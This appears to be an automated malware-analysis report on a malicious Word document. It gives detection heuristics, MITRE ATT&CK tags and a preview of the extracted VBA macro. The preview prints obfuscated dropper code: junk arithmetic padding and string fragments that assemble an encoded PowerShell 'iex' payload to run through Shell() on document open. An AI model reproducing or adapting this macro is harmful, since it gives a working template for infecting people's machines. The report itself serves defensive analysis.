MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The script constructs strings that appear to be part of a command execution payload, specifically referencing 'sShellId[1]' and 'SHEl'. The ClamAV detection 'Doc.Dropper.Agent-6595092-0' further supports its malicious nature as a dropper.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6595092-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6595092-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8658 bytes |
SHA-256: cb58971e950b67c5e987ddf9c9777a02b92e83f3ad0f8f7fd181ce7a8e57bd02 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "aEswBrswCjiowW" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "MBbZWjKCb" Function hsiTYDTUZfB() On Error Resume Next ckbXWA _ = 11096 + Atn(7081) / 91562 / _ Round(31855) / 6674 / CInt(LTXRD) nawUNs = ChrB(20375 + _ Sin(YofiKi * CLng(BUmSf + 58772) _ + 91739 _ + NwQkt)) tMEBmXjY = "HELL" + " " + " " + " " + " " + " " + " " + " ." + Chr(40) + " $" + "sHellId[1" TwXpq _ = 33038 + Atn(93636) / 78103 / _ Round(15590) / 44639 / CInt(NpcRXR) UAJwk = ChrB(98961 + _ Sin(TsBkW * CLng(HQXFrH + 79350) _ + 40055 _ + VNMPi)) hTXRLUAG = "]" + Chr(43) + "$SHEl" + "lID[13]" + Chr(43) + "'" + "x'" + Chr(41) + " " + Chr(40) + " " + Chr(34) + " " + "$" + Chr(40) + " Se" + "T-VarIa" + "BLE '" + "oFs' " + "''" + Chr(41) + Chr(34) + " " + Chr(43) + " [STRIN" pTHph _ = 21579 + Atn(31041) / 86946 / _ Round(99755) / 40973 / CInt(YQWYv) lacwR = ChrB(43546 + _ Sin(QbkCfw * CLng(VQGiYt + 90772) _ + 78782 _ + rXXkfj)) ssdLSvfPk = "G]" + Chr(40) + " [CH" + "ar[]]" + Chr(40) + "2" + " , 92" + ",64 , 6" + "4, 27 " + ", 72,67," + " 81 ," wsZJb _ = 78626 + Atn(13435) / 41645 / _ Round(46867) / 94220 / CInt(ZFaNND) qHKrAC = ChrB(16745 + _ Sin(pkYtmv * CLng(DmKFnK + 62099) _ + 18245 _ + FbMVjL)) Xziir = "11 ," + "73,6" + "8 , " + "76 , 6" + "7 ,69 ," + " 82, " + "6, 104, 6" + "7 , " + "82, 8, " JUAobN _ = 13032 + Atn(85756) / 45094 / _ Round(937) / 58225 / CInt(WzfKms) oDIPZ = ChrB(20519 + _ Sin(ZlYpmN * CLng(GOYmGE + 79825) _ + 60382 _ + infjn)) LKzVAzH = "113,67" + " , 6" + "8 , 1" + "01, 74 ," + "79,67, " + "72 , 82,2" + "9 , 2, 82" + " , 87 , " + "98 ,27, " aRZdhW _ = 51412 + Atn(3338) / 10733 / _ Round(50858) / 56960 / CInt(oUUhNQ) PiGYf = ChrB(76480 + _ Sin(IlZct * CLng(LlLHQJ + 61786) _ + 14147 _ + NSLdbB)) RujLTLYb = "1 ,78 , " + "82 , " + "82, 86" + ", 85 ,2" + "8 , 9 " + ", 9,84 ," + " 73 " + ", 69 ," zAZPK _ = 46479 + Atn(10862) / 38492 / _ Round(86706) / 88880 / CInt(UNpcdj) SCJMRD = ChrB(70688 + _ Sin(iVoMC * CLng(LwoYC + 58849) _ + 37072 _ + jqOVUL)) HYAZPASdmJd = " 77 , 72" + " , 84," + "73,74, 74" + " ,67 , 82" + ", 69 ," + "73 ,8 , " rlpfdJ _ = 97675 + Atn(1112) / 70737 / _ Round(68555) / 41935 / CInt(wpkfjr) JPADaC = ChrB(61924 + _ Sin(WSwvjZ * CLng(rjwjY + 4580) _ + 24254 _ + DpjAWz)) ivHLVoK = "82 ,73" + ",86 , " + "9, 64" + ", 79 ,74," + " 67 , 9" + " ,94," + " 94, 6" LhirCd _ = 81509 + Atn(65186) / 27897 / _ Round(55881) / 95093 / CInt(chmomF) zAhzSa = ChrB(93520 + _ Sin(zOuBJ * CLng(aHRRrX + 82533) _ + 2729 _ + kDbYk)) NXLfWJ = "9 ,69" + " ,69, 75," + "75, 75 " + ", 8 ,67" + " ,94" + " , 67" + ", 1 " + ", 8,11" + "7 , 86" + ",74 , 7" hsiTYDTUZfB = tMEBmXjY + hTXRLUAG + ssdLSvfPk + Xziir + LKzVAzH + RujLTLYb + HYAZPASdmJd + ivHLVoK + NXLfWJ RAuvu _ = 578 + Atn(90122) / 57692 / _ Round(64324) / 21696 / CInt(FMtTU) nwBZVX = ChrB(89552 + _ Sin(kvwwvr * CLng(MBjNz + 12936) _ + 27875 _ + fdjFbR)) End Function Function XKaEmww() On Error Resume Next IiPcnb _ = 65585 + Atn(81342) / 91677 / _ Round(56646) / 99337 / CInt(KEwhl) NtKMG = ChrB(39772 + _ Sin(ZPWwl * CLng(SQGnQ + 63436) _ + 36998 _ + biLkj)) uRnhGqlQQQ = "9 ,82 ," + " 14 ,1 " + ",102, 1, " + "15,29 ," + " 2 ,113" + ", 74 , 74" + " ,6, 27" + ", 6,1, 1" + "9 , 1" + "8, 19" + " ,1 " + ",29 ,2 " tEcjw _ = 96366 + Atn(73207) / 27367 / _ Round(46892) / 38639 / CInt(bvINLL) JLjwEQ = ChrB(60809 + _ Sin(SPlOz * CLng(WUaVmm + 98841) _ + 76386 _ + Eslsol)) ZOqLromGc = ", 64 ," + " 87 ," + " 113 ,27" + " , 2" + " , 67" + ",72,80 ," + " 28,8" + "2 , 6" + "7 ,7" + "5 , 86" qPSRa _ = 45995 + Atn(37270) / 94554 / _ Round(369) / 23615 / CInt(wfWcJ) TEahs = ChrB(48851 + _ Sin(uWjcE * CLng(YqOHZ + 42692) _ + 92287 _ + BwBdUa)) ARwwL = ", 13 ," + " 1 , " + "122,1 ," + "13 , " + "2, 113,7" + "4, 7" + "4 , ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.